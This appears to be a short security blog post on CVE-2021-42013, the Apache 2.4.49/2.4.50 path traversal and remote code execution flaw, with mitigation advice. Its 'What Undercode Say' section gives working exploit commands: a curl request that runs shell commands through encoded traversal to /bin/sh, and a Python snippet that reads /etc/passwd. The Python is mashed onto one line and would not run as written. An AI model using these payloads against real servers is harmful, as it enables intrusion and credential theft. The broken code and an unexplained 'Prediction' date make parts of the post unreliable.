Listen to this Post
How the mentioned CVE works:
The CVE-2021-42013 vulnerability is a path traversal and remote code execution flaw in Apache HTTP Server versions 2.4.49 and 2.4.50. The vulnerability arises from an insufficient fix for CVE-2021-41773. A path traversal attack is possible because the patch did not adequately sanitize user-supplied input within the URL. Specifically, the normalization process could be bypassed using a specific sequence of characters, such as `.%2e` or %%32%65, which are URL-encoded representations of a dot (.). This allows an attacker to traverse directories beyond the document root. If mod_cgi is enabled and a CGI script is present in a directory that is not directly accessible, the attacker can send a crafted request that maps the URL to the CGI script. This results in the arbitrary execution of operating system commands with the privileges of the web server process, leading to full server compromise.
Platform: Apache HTTP Server
Version: 2.4.49 2.4.50
Vulnerability : Path Traversal
Severity: Critical
date: 2021-10-07
Prediction: 2021-10-12
What Undercode Say:
curl -s --path-as-is "http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" -d "echo; id"
nmap -p80 --script http-vuln-cve2021-42013 <target>
import requests url = "http://target/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" data = "echo; cat /etc/passwd" response = requests.post(url, data=data) print(response.text)
How Exploit:
Craft malicious URL
Bypass path normalization
Execute system commands
Protection from this CVE
Update to 2.4.51
Disable mod_cgi
Implement strict access controls
Impact:
Remote Code Execution
Information Disclosure
Full Server Compromise
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

